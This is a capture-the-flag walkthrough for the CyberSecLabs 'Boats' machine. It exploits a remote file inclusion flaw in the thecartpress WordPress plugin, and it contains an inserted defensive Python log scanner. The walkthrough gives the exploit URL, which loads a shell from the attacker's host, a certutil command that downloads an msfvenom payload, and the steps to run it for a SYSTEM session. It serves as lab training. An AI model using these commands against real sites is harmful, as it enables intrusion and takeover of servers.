[CSL] Boats

Boats is a Windows box hosted by CyberSecLabs. Let's dive into it and start with an Nmap scan.

Nmap Scan

Checking HTTP, we notice the website uses WordPress. Let's kick off CMSMap against the website and see if anything interesting is discovered.

As can be seen below, the thecartpress plugin might be vulnerable to RFI.

CMSMap Scan

To test the vuln I used Namam Sahore's RFI shell. You can get it from here. Download the file and use Python to serve it from a simple web server.

The vulnerable parameter is tcp_class_path, reached via: http://boats.csl/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=http://<YOUR_IP>/rfi_shell

The file inclusion succeeds, so we can now send commands to the underlying operating system.

RFI Shell
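On the defender's side, this RFI is visible in the web server's access log as a request whose tcp_class_path value is a full URL. The following Python script is an added example, not part of the original write-up: it scans constructed Apache/XAMPP combined-format log lines and flags any query parameter whose value starts with a remote URL scheme or a PHP stream wrapper. The IPs, timestamps and log lines are constructed.

```python
"""Flag requests whose query parameters carry remote-include style values.

Added example, not from the original write-up. Parses Apache/XAMPP
combined-format access log lines; the sample lines below are constructed.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access log lines (combined log format).
SAMPLE_LOG = """\
10.10.14.5 - - [12/Mar/2021:10:01:02 +0000] "GET /wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=http://10.10.14.5/rfi_shell HTTP/1.1" 200 512 "-" "curl/7.68.0"
10.10.14.5 - - [12/Mar/2021:10:01:10 +0000] "GET /?p=1 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.10.14.5 - - [12/Mar/2021:10:01:12 +0000] "GET /index.php?page=php://input HTTP/1.1" 200 100 "-" "curl/7.68.0"
"""

# client ip, timestamp, method, request target and status from a combined-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Prefixes that, in an include-style parameter, point outside the web root:
# remote URLs and PHP stream wrappers.
SUSPICIOUS_PREFIXES = ("http://", "https://", "ftp://", "php://", "data://", "expect://")


def suspicious_params(target):
    """Return (param, value) pairs whose value starts with a remote/stream prefix."""
    query = urlsplit(target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if v.lower().startswith(SUSPICIOUS_PREFIXES)]


def scan_log(text):
    """Return one finding dict per request that carries a suspicious parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than crash on them
        hits = suspicious_params(m["target"])
        if hits:
            findings.append({"ip": m["ip"], "ts": m["ts"],
                             "path": urlsplit(m["target"]).path,
                             "status": int(m["status"]), "params": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A status of 200 on a flagged request is the signal worth paging on, since it means the include was likely served rather than rejected.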

Generate a shell with msfvenom and download it with certutil. You can use the following syntax to download it: certutil -urlcache -f http://<YOUR_IP>/shell.exe shell.exe

Create an msf listener and run it.

MSF Listener

Get back to your RFI shell, type the path of the exe payload and execute it.

Executing the payload

The session is spawned as NT AUTHORITY\SYSTEM because the XAMPP service was running under this account.

Interacting with the session

You should now be able to grab both the user and admin flags.